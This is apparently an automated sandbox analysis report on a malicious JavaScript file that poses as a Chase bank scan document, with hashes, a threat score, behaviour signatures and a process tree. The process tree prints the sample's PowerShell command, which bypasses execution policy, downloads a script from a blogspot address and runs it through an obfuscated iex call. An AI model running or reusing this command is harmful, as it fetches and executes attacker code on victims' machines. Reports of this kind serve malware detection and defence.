Resubmissions

16-01-2024 10:45

240116-mtr1naaaeq 10

16-01-2024 10:39

240116-mpymmshhgp 10

Analysis

  • max time kernel
    121s
  • max time network
    126s
  • platform
    windows7_x64
  • resource
    win7-20231215-en
  • resource tags

    arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system
  • submitted
    16-01-2024 10:39

General

  • Target

    New_ScanDoc#092387CHASEeAdvice.js

  • Size

    1.4MB

  • MD5

    286d534eb759c671fa9e79cfafd3bc85

  • SHA1

    d165938c1c607618c5cb6d9d11cf5b371f007ac7

  • SHA256

    77109ba56a5e70fafe88a10800764ec30d35727c1ff8cdb2934534ae8c7e048b

  • SHA512

    3b1ee1a647b623265ad7e90d786e61cafe6ca5e312676dafcc198763cf8efe3f479fb66b4aae9d1e7289ec5433055ab193ffd91abefc732e3d337d4fe987119b

  • SSDEEP

    192:FQzfvQzrHHHHHH3HHHHHH3HHHHHH3HHHHHH3HHHHHH3HHHHHH3HHHHHHnHHHHHHf:efYzD

Score
7/10

Malware Config

Signatures

  • Deletes itself 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\New_ScanDoc#092387CHASEeAdvice.js
    1⤵
    • Deletes itself
    • Suspicious use of WriteProcessMemory
    PID:1472
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;$(irm simoubizw.blogspot.com///////////////////////////atom.xml) | . ('i*x').replace('*','e');Start-Sleep -Seconds 6
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2056

Network

MITRE ATT&CK Matrix ATT&CK v13

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/2056-4-0x000000001B340000-0x000000001B622000-memory.dmp
    Filesize

    2.9MB

  • memory/2056-5-0x0000000002150000-0x0000000002158000-memory.dmp
    Filesize

    32KB

  • memory/2056-6-0x000007FEF5650000-0x000007FEF5FED000-memory.dmp
    Filesize

    9.6MB

  • memory/2056-7-0x0000000002520000-0x00000000025A0000-memory.dmp
    Filesize

    512KB

  • memory/2056-8-0x000007FEF5650000-0x000007FEF5FED000-memory.dmp
    Filesize

    9.6MB

  • memory/2056-10-0x0000000002520000-0x00000000025A0000-memory.dmp
    Filesize

    512KB

  • memory/2056-11-0x0000000002520000-0x00000000025A0000-memory.dmp
    Filesize

    512KB

  • memory/2056-9-0x0000000002520000-0x00000000025A0000-memory.dmp
    Filesize

    512KB

  • memory/2056-12-0x000007FEF5650000-0x000007FEF5FED000-memory.dmp
    Filesize

    9.6MB